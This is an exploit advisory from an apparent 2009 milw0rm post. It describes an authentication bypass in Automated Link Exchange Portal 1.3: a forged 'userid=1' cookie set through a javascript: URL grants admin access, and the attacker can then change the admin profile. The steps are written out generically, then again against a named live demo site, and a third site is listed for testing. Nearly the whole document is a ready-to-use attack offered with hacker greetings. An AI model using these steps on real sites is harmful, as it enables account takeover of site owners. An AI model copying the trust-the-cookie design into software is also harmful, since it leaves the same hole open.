-------------------------------------------------------------------------
Automated Link Exchange Portal V1.3 Multiple Remote Vulnerabilities
---------------------------------------------------------------
Founder : TiGeR-Dz
Home:www.h4ckx.com
Script: Automated Link Exchange Portal Version 1.3
Download:http://www.cmsnx.com/product.demo.php?id=11
alf mabroke bfowze al montakhabe alwatany :D
---------------------------------------------------------------
Exploit
-------
Note:Follow these steps
after enter the cookie (javascript:document.cookie="userid=1;path=/";) and go
to login http://www.site.com/[path]/user.mainpage.php and change profile admin at
http://www.site.com/[path]/user.edit.account.php
exploit= cookie handling + Bypass login + change profile :)
--------------------------------------------------------------
cookie handling :
-----------------------
javascript:document.cookie="userid=1;path=/";
-------------------------------------------------------------
Bypass login :
------------------
go to http://www.site.com/[path]/user.mainpage.php
----------------------------------------------------------------
change profile Admin :
----------------------------
http://www.site.com/[path]/user.edit.account.php
----------------------------------------------------------
Dem0
----
http://www.kalptarudemos.com/demo/linkspile/
----------------------------------------------------------------
cookie handling :
-----------------------
javascript:document.cookie="userid=1;path=/";
-------------------------------------------------------------
Bypass login :
------------------
go to http://www.kalptarudemos.com/demo/linkspile/user.mainpage.php
----------------------------------------------------------------
change profile Admin :
----------------------------
http://www.kalptarudemos.com/demo/linkspile/user.edit.account.php
----------------------------------------------------------
test:
--------
http://www.linkspile.com/
---------------------------------------------------------------
Greeting To ALL My Friends (Dz)
-----------------------------------------------------------------
# milw0rm.com [2009-06-08]